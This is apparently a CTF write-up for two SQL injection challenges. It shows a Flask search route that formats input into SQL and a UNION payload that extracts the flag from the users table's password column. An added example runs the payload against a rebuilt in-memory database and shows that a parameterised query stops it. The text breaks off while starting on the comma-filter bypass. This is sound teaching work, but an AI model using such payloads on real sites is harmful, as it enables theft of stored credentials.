Spark's Shop && revenge:

Our friend Stylish was developing a website for the first time. He thought that he had secured it well, but it is Ramadan and we know that people can be delusional. Can you check it?

link: https://shop-spark.events-spark.tech/

When opening the link, the player is greeted with a shop website that only has a search bar. Checking the source code, the player will notice that the search keyword is concatenated into the SELECT query without a prepared statement, so we have an SQL injection. The database schema is also in the source:

import sqlite3

def create_table():
    # Opens (or creates) the on-disk database used by the shop
    conn = sqlite3.connect('pro.db')
    cursor = conn.cursor()
    # Products shown by the search page: 4 of these columns are selected by /search
    cursor.execute("""
        CREATE TABLE IF NOT EXISTS products (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            title TEXT NOT NULL,
            price REAL NOT NULL,
            description TEXT,
            category TEXT,
            image TEXT,
            rating_rate REAL,
            rating_count INTEGER,
            created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
            updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
        )
    """)
    # Users table: the flag is stored as the password of the 'flag' user
    cursor.execute("""
        CREATE TABLE IF NOT EXISTS users (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            username TEXT NOT NULL,
            password TEXT NOT NULL
        )""")
    cursor.execute("""INSERT INTO users (username, password) VALUES ('flag', 'Spark{34sy_P3zZy_1nJ3ct10n_Sq3uzzY@}')""")
    conn.commit()
    conn.close()

We have the table structure, and the flag is in the password field of the users table, so we need to extract it.

Looking at the code section that handles the search:

from flask import Flask, g, redirect, render_template, request

app = Flask(__name__)

# g.conn and g.cursor are opened elsewhere in the app (not shown in the writeup)
@app.route('/search', methods=['POST'])
def execute() -> str:
    if request.method == 'POST':
        search = request.form['search']
        # Vulnerable: the search keyword is formatted straight into the SQL text,
        # so a single quote in the input terminates the LIKE string literal
        sql = f"SELECT title, category, price, image FROM products WHERE title LIKE '%{search}%'"
        g.cursor.execute(sql)
        res = g.cursor.fetchall()
        print(res)
        g.conn.close()
        # The rows are rendered back to the user, so the result is visible (reflected)
        return render_template('index.html', res=res)
    return redirect('/')

We have a SELECT statement with 4 columns, and the data is reflected in the output, so we can use a UNION attack to extract the flag. Since the original statement selects 4 columns, the UNION SELECT must also return 4 columns. The payload is:

' UNION SELECT NULL,NULL,NULL,password from users-- -
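To show why the page's payload works and how the route should have been written, here is an added example (not part of the writeup or the challenge code) that rebuilds the challenge schema in an in-memory SQLite database with a constructed placeholder flag, runs the payload above against the vulnerable string-formatted query, and runs it against a parameterised version of the same query.

```python
import sqlite3

# Constructed copy of the challenge schema; the flag value is a placeholder, not the real one.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL,
    price REAL NOT NULL, description TEXT, category TEXT, image TEXT,
    rating_rate REAL, rating_count INTEGER);
CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT NOT NULL,
    password TEXT NOT NULL);
INSERT INTO products (title, price, category, image) VALUES ('Spark Lamp', 9.99, 'home', 'lamp.png');
INSERT INTO users (username, password) VALUES ('flag', 'Spark{placeholder_flag}');
"""

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(':memory:')
    conn.executescript(SCHEMA)
    return conn

def search_vulnerable(conn: sqlite3.Connection, search: str) -> list:
    # Same pattern as the challenge route: the input is formatted into the SQL text.
    sql = f"SELECT title, category, price, image FROM products WHERE title LIKE '%{search}%'"
    return conn.execute(sql).fetchall()

def search_fixed(conn: sqlite3.Connection, search: str) -> list:
    # Parameterised query: the driver binds the value, so quotes and keywords in the
    # input stay data and can never terminate the LIKE pattern or add a UNION.
    sql = "SELECT title, category, price, image FROM products WHERE title LIKE ?"
    return conn.execute(sql, (f"%{search}%",)).fetchall()

# The payload from the writeup above
PAYLOAD = "' UNION SELECT NULL,NULL,NULL,password from users-- -"

def leaked_passwords(rows: list) -> list:
    # A UNION row has NULL in the title column and the password in the 4th (image) column
    return [row[3] for row in rows if row[0] is None]

def demo() -> tuple:
    conn = make_db()
    vuln_rows = search_vulnerable(conn, PAYLOAD)   # products + one injected users row
    fixed_rows = search_fixed(conn, PAYLOAD)       # no title matches the literal payload
    return leaked_passwords(vuln_rows), leaked_passwords(fixed_rows), len(fixed_rows)

if __name__ == '__main__':
    print(demo())  # (['Spark{placeholder_flag}'], [], 0)
```

A normal keyword such as `lamp` still returns the product through `search_fixed`, so the fix costs nothing in functionality; stripping characters from the input, as the revenge version does, is not a substitute for binding the value.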


Link: https://gaaroura.events-spark.tech

For the revenge version we added a single filter: a comma filter.

 search = search.replace(',', '')

Here we need to bypass this filter; as in the previous challenge, the flag is in the password field of the users table.

The comma filter can be bypassed using the JOIN